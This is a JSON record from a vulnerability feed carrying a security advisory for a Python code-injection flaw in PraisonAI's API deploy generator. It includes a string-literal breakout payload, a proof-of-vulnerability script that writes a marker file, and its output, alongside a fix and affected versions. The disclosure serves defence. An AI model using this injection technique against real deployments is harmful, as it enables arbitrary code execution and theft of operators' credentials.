{"success":true,"data":{"threats":[{"id":"b19c8a97-d79f-44f7-87f3-244328a99811","slug":"cve-2026-61433","externalId":"CVE-2026-61433","source":"OSV","sourceType":"ghsa","type":"vulnerability","title":"PraisonAI: API deploy code generator embeds unescaped YAML fields into Python source","description":"# API deploy code generator embeds unescaped YAML fields into Python source\n\n## Summary\n\nPraisonAI's API deployment generator copies `deploy.api.host` from `agents.yaml` directly into generated Python source without safe literal encoding. A malicious PraisonAI project can set that host value to a Python expression splice; when an operator runs the API deploy flow, the generated server source compiles and executes the injected expression at startup. The same generator also embeds `agents_file` directly into generated route-handler expressions, giving a second route-time source injection site if the agent file path is attacker-controlled.\n\n## Technical Details\n\nThe vulnerable path starts with deployment configuration parsing. `Deploy.from_yaml()` reads the operator-supplied `agents.yaml`, `validate_agents_yaml()` accepts `deploy.api.host` as a string, and API deployments call `start_api_server(self.agents_file, self.config.api)`. `start_api_server()` calls `generate_api_server_code()` and executes the generated Python file with `python`.\n\nThe current generator in `src/praisonai/praisonai/deploy/api.py` treats deployment data as Python syntax:\n\n```python\ndef generate_api_server_code(agents_file: str, config: Optional[APIConfig] = None) -> str:\n    ...\n    code = f'''\"\"\"\n...\n        praisonai = PraisonAI(agent_file=\"{agents_file}\")\n...\n        \"agent_file\": \"{agents_file}\"\n...\n    app.run(\n        host='{config.host}',\n        port={config.port},\n        debug={config.reload}\n    )\n'''\n```\n\nThe violated invariant is that deployment configuration values should remain inert strings. Instead, `config.host` is inserted between single quotes in generated Python source. A value like this breaks out of the generated string literal and evaluates a Python expression:\n\n```text\n' + (__import__(\"pathlib\").Path(\"poc.txt\").write_text(\"DEPLOY_API_HOST_CODE_EXECUTED\") and \"\") + '\n```\n\nThe generated startup code then becomes equivalent to:\n\n```python\napp.run(\n    host='' + (__import__(\"pathlib\").Path(\"poc.txt\").write_text(\"DEPLOY_API_HOST_CODE_EXECUTED\") and \"\") + '',\n    port=8005,\n    debug=False,\n)\n```\n\nThat expression executes before Flask handles any request. This is not a shell parsing issue and not just direct use of an unsafe Python API; it is a data-to-code transformation in the deployment generator.\n\n`agents_file` has the same class of unsafe source interpolation in two generated route-handler expressions. A value shaped as `\" + (<side effect> and \"\") + \"` remains valid both in `PraisonAI(agent_file=...)` and in the `/agents` JSON response expression, so it executes when the generated handler evaluates that value.\n\n## PoV\n\nThe following local-only PoV stubs Flask and PraisonAI so it does not start a listener, invoke a model provider, or contact any external service. It proves that a malicious host value survives YAML schema parsing and executes when the generated server module is evaluated as `__main__`; it also includes a safe-host negative control and the secondary `agents_file` route-time interpolation check.\n\n```python\nfrom pathlib import Path\nimport json\nimport sys\nimport tempfile\nimport types\n\nimport yaml\n\n\ndef install_stubs():\n    class FakeApp:\n        def __init__(self, name):\n            self.name = name\n\n        def route(self, *args, **kwargs):\n            def deco(func):\n                return func\n\n            return deco\n\n        def run(self, *args, **kwargs):\n            return None\n\n    flask = types.ModuleType(\"flask\")\n    flask.Flask = FakeApp\n    flask.request = types.SimpleNamespace(headers={}, get_json=lambda: {\"message\": \"hello\"})\n    flask.jsonify = lambda obj: obj\n    sys.modules[\"flask\"] = flask\n\n    flask_cors = types.ModuleType(\"flask_cors\")\n    flask_cors.CORS = lambda app: app\n    sys.modules[\"flask_cors\"] = flask_cors\n\n    praisonai_mod = types.ModuleType(\"praisonai\")\n\n    class FakePraisonAI:\n        def __init__(self, agent_file):\n            self.agent_file = agent_file\n\n        def run(self):\n            return \"ok\"\n\n    praisonai_mod.PraisonAI = FakePraisonAI\n    sys.modules[\"praisonai\"] = praisonai_mod\n\n\ndef main(repo):\n    sys.path.insert(0, str(Path(repo) / \"src\" / \"praisonai\"))\n    from praisonai.deploy.api import generate_api_server_code\n    from praisonai.deploy.models import APIConfig\n    from praisonai.deploy.schema import validate_agents_yaml\n\n    install_stubs()\n\n    with tempfile.TemporaryDirectory() as tmp:\n        tmp_path = Path(tmp)\n        host_marker = tmp_path / \"host-marker.txt\"\n        file_marker = tmp_path / \"agent-file-marker.txt\"\n        host_payload = \"' + (__import__(\\\"pathlib\\\").Path(\" + repr(str(host_marker)) + \").write_text(\\\"DEPLOY_API_HOST_CODE_EXECUTED\\\") and \\\"\\\") + '\"\n        agents_yaml = tmp_path / \"agents.yaml\"\n        agents_yaml.write_text(yaml.safe_dump({\n            \"deploy\": {\n                \"type\": \"api\",\n                \"api\": {\"host\": host_payload, \"port\": 8005, \"auth_enabled\": False},\n            },\n            \"agents\": [{\"name\": \"demo\", \"role\": \"demo\", \"goal\": \"demo\"}],\n        }))\n        parsed_config = validate_agents_yaml(str(agents_yaml))\n\n        results = []\n        for label, config in [\n            (\"safe_host\", APIConfig(host=\"127.0.0.1\", auth_enabled=False)),\n            (\"malicious_host_from_yaml\", parsed_config.api),\n        ]:\n            host_marker.unlink(missing_ok=True)\n            code = generate_api_server_code(\"agents.yaml\", config)\n            compile(code, f\"<generated-{label}>\", \"exec\")\n            exec(code, {\"__name__\": \"__main__\"})\n            results.append({\n                \"case\": label,\n                \"compiled\": True,\n                \"host_preserved_by_yaml_parser\": config.host == host_payload if label.startswith(\"malicious\") else None,\n                \"marker_exists_after_startup\": host_marker.exists(),\n                \"marker_contents\": host_marker.read_text() if host_marker.exists() else None,\n                \"generated_contains_raw_host\": config.host in code,\n            })\n\n        file_payload = \"\\\" + (__import__(\\\"pathlib\\\").Path(\" + repr(str(file_marker)) + \").write_text(\\\"DEPLOY_API_AGENT_FILE_CODE_EXECUTED\\\") and \\\"\\\") + \\\"\"\n        file_marker.unlink(missing_ok=True)\n        code = generate_api_server_code(file_payload, APIConfig(host=\"127.0.0.1\", auth_enabled=False))\n        compile(code, \"<generated-agent-file>\", \"exec\")\n        namespace = {\"__name__\": \"generated_agent_file\"}\n        exec(code, namespace)\n        namespace[\"list_agents\"]()\n        results.append({\n            \"case\": \"malicious_agent_file_route_value\",\n            \"compiled\": True,\n            \"marker_exists_after_list_agents\": file_marker.exists(),\n            \"marker_contents\": file_marker.read_text() if file_marker.exists() else None,\n            \"generated_contains_raw_agent_file\": file_payload in code,\n        })\n\n    print(json.dumps(results, indent=2))\n    return 0 if results[1][\"marker_exists_after_startup\"] and results[2][\"marker_exists_after_list_agents\"] else 1\n\n\nif __name__ == \"__main__\":\n    raise SystemExit(main(sys.argv[1] if len(sys.argv) > 1 else \".\"))\n```\n\n## PoC\n\nCommand used against current source:\n\n```sh\nuv run --with pydantic --with pyyaml python pov_deploy_api_config_injection.py /path/to/PraisonAI\n```\n\nDecisive output:\n\n```json\n[\n  {\n    \"case\": \"safe_host\",\n    \"compiled\": true,\n    \"host_preserved_by_yaml_parser\": null,\n    \"marker_exists_after_startup\": false,\n    \"marker_contents\": null,\n    \"generated_contains_raw_host\": true\n  },\n  {\n    \"case\": \"malicious_host_from_yaml\",\n    \"compiled\": true,\n    \"host_preserved_by_yaml_parser\": true,\n    \"marker_exists_after_startup\": true,\n    \"marker_contents\": \"DEPLOY_API_HOST_CODE_EXECUTED\",\n    \"generated_contains_raw_host\": true\n  },\n  {\n    \"case\": \"malicious_agent_file_route_value\",\n    \"compiled\": true,\n    \"marker_exists_after_list_agents\": true,\n    \"marker_contents\": \"DEPLOY_API_AGENT_FILE_CODE_EXECUTED\",\n    \"generated_contains_raw_agent_file\": true\n  }\n]\n```\n\nThe `safe_host` negative control compiles and evaluates the generated module without a marker side effect. The `malicious_host_from_yaml` case proves the YAML parser preserved the malicious host as a config string and the generated server executed it at startup. The `malicious_agent_file_route_value` case proves the secondary file-path interpolation executes when the generated `/agents` handler evaluates the generated response.\n\n## Impact\n\nIf an operator deploys a malicious PraisonAI project configuration, arbitrary Python can execute in the deploy process when the generated API server starts. That process can access the operator's environment, source tree, local files, model/API credentials, and deployment credentials. This is a project-configuration supply-chain issue rather than an unauthenticated remote endpoint: the security boundary is that deployment config values should stay data and not become executable Python source.\n\n## Suggested Fix\n\nDo not interpolate deployment values directly into generated Python source. Use `repr()` or `json.dumps()` for every generated Python literal, or load runtime values from a JSON sidecar, environment variable, or command-line argument instead of embedding them into source. For the current generator, replace `host='{config.host}'` with a safely encoded literal such as `host={config.host!r}`, and apply the same safe encoding to `agents_file` in both generated sites. Add regression tests with host and agent-file values containing quotes, newlines, and expression-splice strings; the generated source should compile and treat those values as inert strings.\n\n## Affected Package/Versions\n\nPackage: `praisonai`\n\nConfirmed current head: `1620b49f36945d8cc8ee5635b906c960df5097a0`\n\nStatic sweep:\n\n| Target | Result |\n| --- | --- |\n| `v4.5.128` | affected; raw `agents_file` and `config.host` interpolation present |\n| `v4.6.58` | affected; raw `agents_file` and `config.host` interpolation present |\n| `v4.6.59` | affected; raw `agents_file` and `config.host` interpolation present |\n| `v4.6.60` | affected; raw `agents_file` and `config.host` interpolation present |\n| `v4.6.62` | affected; raw `agents_file` and `config.host` interpolation present |\n| `v4.6.63` | affected; raw `agents_file` and `config.host` interpolation present |\n| current `1620b49f` | affected; raw `agents_file` and `config.host` interpolation present |\n\nSuggested severity: High\n\nSuggested CVSS v3.1:\n\n```text\nCVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n```\n\nSuggested CWEs:\n\n- CWE-94: Improper Control of Generation of Code\n- CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code\n- CWE-116: Improper Encoding or Escaping of Output\n\n## Advisory History\n\nThe closest same-generator comparator is `GHSA-8444-4fhq-fxpq`, \"PraisonAI deploy --type api emits a Flask server with authentication disabled by default.\" That advisory concerns the security posture of the generated Flask API server: missing authentication by default. This report is different: authentication can be enabled or disabled and the issue still exists because `generate_api_server_code()` emits deployment strings as Python syntax. The exploit primitive is generated-source injection from `deploy.api.host` and `agents_file`, not unauthenticated request access to the generated API.\n\nThis is also distinct from `GHSA-6rmh-7xcm-cpxj` / `CVE-2026-44338`, which addressed a legacy generated API server authentication issue. Both authentication advisories are useful context because they involve generated API server deployment, but neither covers unsafe literal encoding or Python expression injection in `generate_api_server_code()`.\n\nAgentOS, AgentTeam, A2U, MCP, and recipe-server authentication bypass reports are separate server-surface issues. Their root cause is missing request authentication or bind-policy enforcement, while this report's root cause is unsafe code generation before the server handles traffic.\n\n## References\n\n- `src/praisonai/praisonai/deploy/api.py`: `generate_api_server_code()` and `start_api_server()`\n- `src/praisonai/praisonai/deploy/main.py`: `Deploy.from_yaml()` and API/Docker deployment paths\n- `src/praisonai/praisonai/cli/features/deploy.py`: CLI deployment handler\n- `GHSA-8444-4fhq-fxpq`: prior `praisonai deploy --type api` generated API server authentication-default issue\n- `GHSA-6rmh-7xcm-cpxj` / `CVE-2026-44338`: prior generated API server authentication issue\n- CWE-94: https://cwe.mitre.org/data/definitions/94.html\n- CWE-95: https://cwe.mitre.org/data/definitions/95.html\n- CWE-116: https://cwe.mitre.org/data/definitions/116.html","cveId":"CVE-2026-61433","cvssScore":null,"cvssVector":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","severity":"high","vendor":"PyPI","product":"praisonai","affectedVersions":["pkg:pypi/praisonai < 4.6.78"],"cwes":["CWE-116","CWE-94","CWE-95"],"tags":["osv","osv:ghsa-79fv-7hq9-w7xg","ecosystem:pypi"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://osv.dev/vulnerability/GHSA-79fv-7hq9-w7xg","type":"advisory","title":"OSV GHSA-79fv-7hq9-w7xg"},{"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-79fv-7hq9-w7xg","type":"other","title":"OSV web"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-61433","type":"advisory","title":"OSV advisory"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-62173","type":"advisory","title":"OSV advisory"},{"url":"https://github.com/MervinPraison/PraisonAI/commit/1620b49f36945d8cc8ee5635b906c960df5097a0","type":"other","title":"OSV web"},{"url":"https://github.com/MervinPraison/PraisonAI","type":"vendor","title":"OSV package"},{"url":"https://www.vulncheck.com/advisories/praisonai-before-code-injection-via-api-deployment-generator","type":"other","title":"OSV web"}],"epssScore":0.0021,"epssPercentile":0.10331,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-08T19:36:29.000Z","addedAt":"2026-10-08T19:47:39.017Z","updatedAt":"2026-10-08T21:08:31.085Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-61433","note":"may still be awaiting NVD analysis"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-61433","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-79FV-7HQ9-W7XG"}]}],"pagination":{"page":1,"limit":20,"total":1,"totalPages":1,"hasNext":false,"hasPrev":false}},"meta":{"apiVersion":"v1","requestedAt":"2026-10-08T23:50:45.385Z","durationMs":10,"filters":{"search":null,"severity":[],"type":[],"country":[],"tag":["osv:ghsa-79fv-7hq9-w7xg"],"cwe":[],"vendor":null,"product":null,"cve":null,"source":[],"days":null,"publishedAfter":null,"publishedBefore":null,"minCvss":null,"maxCvss":null,"minEpss":null,"knownExploited":null,"hasPatch":null,"hasNucleiTemplate":null},"sort":"newest","unknownParams":[],"warnings":[]}}